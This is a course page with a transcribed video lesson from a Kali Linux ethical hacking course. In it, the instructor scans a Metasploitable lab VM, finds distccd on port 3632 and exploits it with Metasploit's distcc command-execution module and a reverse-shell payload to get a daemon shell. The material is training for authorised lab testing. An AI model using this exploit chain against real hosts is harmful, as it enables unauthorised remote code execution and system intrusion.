From the course: Kali Linux for Advanced Pen Testing and Ethical Hacking
Unlock this course with a free trial
Join today to access over 25,300 courses taught by industry experts.
Exploiting the distributed compile system - Linux Tutorial
From the course: Kali Linux for Advanced Pen Testing and Ethical Hacking
Exploiting the distributed compile system
- [Instructor] Sometimes we'll run a default scan and find nothing of interest. But in fact, there could be services existing on ports outside of the default scanning range. If we run a wider scanner on Metasploitable, we find that there's a service running on port 3632. Let's check this, and map minus PS minus sV minus p3632. And we find the distccd service. Let's check what searchsploit has for us, searchsploit distcc. And we find there's a command execution in Metasploit for this cc. Msfconsole and we'll search again for distcc and we find it we'll use zero and we'll set our remote host to 10.0.2.8. And we'll set lhost* Kali System 10.0.2.18 And we'll set the payload to cmd/unix/reverse and we'll exploit. And we have a shell, who am I, we're a daemon. And we're in a user shell.
Practice while you learn with exercise files
Download the files the instructor uses to teach the course. Follow along and learn by watching, listening and practicing.
Contents
-
-
-
-
-
-
-
(Locked)
Targeting Metasploitable44s
-
(Locked)
Exploiting VSFTPD3m 22s
-
(Locked)
Exploiting with ProFTPD4m 52s
-
(Locked)
Exploiting Tomcat2m 58s
-
(Locked)
Exploiting IRC1m 23s
-
(Locked)
Exploiting the distributed compile system1m 35s
-
(Locked)
Exploiting network files2m 59s
-
(Locked)
Hiding in plain sight43s
-
(Locked)
Escalating to root5m 18s
-
(Locked)
-
-
-
-